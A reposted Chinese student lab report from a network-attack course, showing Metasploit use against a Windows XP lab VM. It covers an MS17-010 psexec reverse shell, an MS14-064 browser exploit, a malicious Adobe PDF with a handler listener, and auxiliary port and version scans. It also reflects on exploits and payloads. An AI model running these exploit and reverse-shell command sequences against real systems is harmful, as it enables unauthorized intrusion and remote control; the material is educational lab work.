2018-2019 20165237网络对抗 Exp5 MSF基础应用

最新推荐文章于 2024-09-14 20:37:51 发布
最新推荐文章于 2024-09-14 20:37:51 发布
阅读量94 收藏
点赞数
文章标签: 网络 shell 数据库
原文链接:http://www.cnblogs.com/Miss-moon/p/10744827.html
版权

2018-2019 20165237网络对抗 Exp5 MSF基础应用

实验目标

  • 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
  • 一个主动攻击实践,如ms08-067; (1分)

ms17_010_psexec(√) 不唯一

  • 一个针对浏览器的攻击,如ms11-050;(1分)

ms14_064_ole_lode_execution(√)不唯一

  • 一个针对客户端的攻击,如Adobe;(1分)
  • adobe_geticon(√) 唯一
  • 成功应用任何一个辅助模块。(0.5分)

scanner/http/ssl_version(√)不唯一

scanner/portscan/tcp (√)不唯一

scanner/oracle/tnslsnr_version (√)唯一

  • 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

Exp 5.1 一个主动攻击实践-ms17-010

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > show payloads
msf exploit(windows/smb/ms17_010_psexec) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.153.135 //攻击机ip
msf exploit(windows/smb/ms17_010_psexec) > set LPORT 5237 //攻击端口
msf exploit(windows/smb/ms17_010_psexec) > set RHOST 192.168.153.136 //靶机ip,特定漏洞端口已经固定
msf exploit(windows/smb/ms17_010_psexec) > run //攻击

1298409-20190421125728146-1157560882.png

1298409-20190421130444241-1331508922.png

  • 攻击成功如下:
    1298409-20190421130457112-1949093037.png

Exp 5.2 对浏览器的攻击 ms14_064

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
msfconsole
msf > use windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp //http反向回连
set LHOST 192.168.153.135//攻击机ip
set Lport 5237//攻击端口固定
exploit //攻击

  • 可以看到生成的一个URL:http://192.168.153.135:8080/YT1IHT
    1298409-20190421131200751-1525247403.png

  • 在XP的IE上点开后:
    1298409-20190421131215043-1977813117.png

  • 回到Kali,查看sessions,输入sessions -i 4后,发现攻击成功,获得shell功能
    1298409-20190421131232527-1165743170.png

Exp 5.3 针对Adobe Reader软件的渗透攻击-adobe-geticon

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
    -依次输入以下指令:
search Adobe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
set filename 20165237.pdf
exploit

1298409-20190421131444199-6576152.png
1298409-20190421131453994-461741358.png

  • 找到pdf文件(要打开显示隐藏文件选项)

  • 接着输入以下代码
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.153.135
set LPORT 5237
exploit

  • 接着在xp中点开pdf文件,回到kali,发现回传了一些东西。
    1298409-20190421131508982-1294479088.png
    1298409-20190421131532132-365762216.png
    1298409-20190421131609934-431222306.png

  • 查看sessions,输入session -i 1,发现攻击成功,可以使用shell。
    1298409-20190421131626331-77257756.png

Exp 5.4 辅助功能攻击-tcp+ssl_version+tnslsnr_version

  • 攻击机:Kali(IP地址:192.168.153.135)
  • 靶机: windows XP(IP地址:192.168.153.136)
  • 输入search auxiliary
  • 选择其中一个进行使用(其实我试了很多,成功的也挺多,但是和之前的人重复,所以我就多用了几个,可能会重复,但是我觉得效果很好)

  • tcp扫描成功:
    1298409-20190421131833434-758784960.png
    1298409-20190421131845080-1783354479.png

  • ssl版本模块扫描成功:
    1298409-20190421131856106-2067773149.png
    1298409-20190421131908411-1324980745.png

  • OracleSQL的监听服务攻击成功:
    1298409-20190421131926368-1135809113.png

实验感想和问题

  • 用自己的话解释什么是exploit,payload,encode?

exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击。

payload:可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。说白了就是传送到靶机上的用来攻击的恶意代码。

encode:对payload进行编码

  • 离实战还缺些什么技术或步骤?
    1、在实践中发现MSF攻击的局限性很大,其中的漏洞几乎都是针对win XP系统,而实际应用的系统大部分是win7及以上的系统,如果需要实战攻击win7及以上的系统,还需要不断发现并成功利用新的漏洞。
    2、需要提高扫描等信息收集技术,信息收集是做攻击的重要前提,但大多数初级的扫描都会被win7及以上的系统发现甚至拒绝,所以提供相应的技术很重要。

  • 感想:

这次实验花费了很多时间去查找能攻击成功的漏洞,但是让我对于msf更加熟练,甚至更加崇拜,希望以后能够使用它更多的领域。

转载于:https://www.cnblogs.com/Miss-moon/p/10744827.html

weixin_30758821
关注
http version scan
Nixawk
07-28 1329
介绍一下nmap与metasploit如何获取 http versionxi
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 384
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
Metasploit简单应用
m0_48907714的博客
03-09 8390
Metasploit简单应用
渗透测试靶机实战---系统篇07 (中危漏洞)
一杯咖啡的渗透记忆
10-16 971
(续)渗透测试靶机实战---系统篇06 上篇最后一个是中危漏洞,从这篇开始主要是针对中危漏洞的一些渗透: 1.awiki Multiple Local File Include Vulnerabilities 2.Check if Mailserver answer to VRFY and EXPN requests msf5 auxiliary(scanner/...
metasploit使用辅助模块
热门推荐
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
2018-2019 20165208 网络对抗 Exp5 MSF基础
weixin_34404393的博客
04-12 238
目录 2018-2019 20165208 网络对抗 Exp5 MSF基础 实验内容 基础问题回答 实践过程记录 1.一个主动攻击实践,如ms08_067; 2. 一个针对浏览器的攻击,如ms11_050; 3. 一个针对客户端的攻击,如Adobe;...
2018-2019 20165221 网络对抗 Exp5 MSF基础
weixin_30435261的博客
04-20 159
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 一个主动攻击实践,如ms08_067; (1分 一个针对浏览器的攻击,如ms11_050;(1分) 一个针对客户端的攻击,如Adobe;(1分) 成功应用任何一个辅助模块。(0.5分) 具体实验操作 攻击机(kal...
2018-2019 20165235 网络对抗 Exp5 MSF基础
weixin_30682415的博客
04-15 118
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.168.21.128 永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 进入msfconsole输入 use exploit/windows/smb...
2018-2019 20165220 网络对抗 Exp5 MSF基础
weixin_30609331的博客
04-20 152
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050;(1分) 1.3 一个针对客户端的攻击,如Adobe;(1分) 1.4 成功应用任何一个辅助模块。(0.5分) 以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。 基础问题回答 (1)用自己的话解释什么是exploit,payl...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 983
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp4 恶意代码分析
weixin_44826338的博客
04-17 559
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp1 恶意代码分析 目录 1. 实验目标 2. 实验内容 2.1 系统运行监控 2.1.1 Windows计划任务schtasks 2.1.2 sysmon工具 2.2 恶意软件分析 2.2.1 系统运行监控 2.2.1 系统运行监控 3、答老师问 3.1 实验收获与感想 3.2 如果在工作中怀...
20204323太晓梅 网络对抗exp6 MSF应用基础
m0_57567318的博客
05-04 152
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 707
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
Java-网络
2301_81543552的博客
09-14 357
Java中的网络编程主要涉及使用Socket类进行网络通信,以及理解各种网络协议。以下是一些关键概念和示例代码,帮助您入门。
4.网络编程
weixin_45476535的博客
09-14 214
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 98
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器并使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
网络工程师学习笔记——网络互连与互联网
最新发布
2301_77279557的博客
09-14 574
网络互连相关技术
如何在DPDK中实现协议解析?
Do my best!
09-10 668
在 DPDK 中实现协议解析涉及几个步骤,包括初始化环境、配置网卡、接收数据包、解析数据包并处理数据包。下面将详细介绍这些步骤以及如何在 DPDK 中实现基本的协议解析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值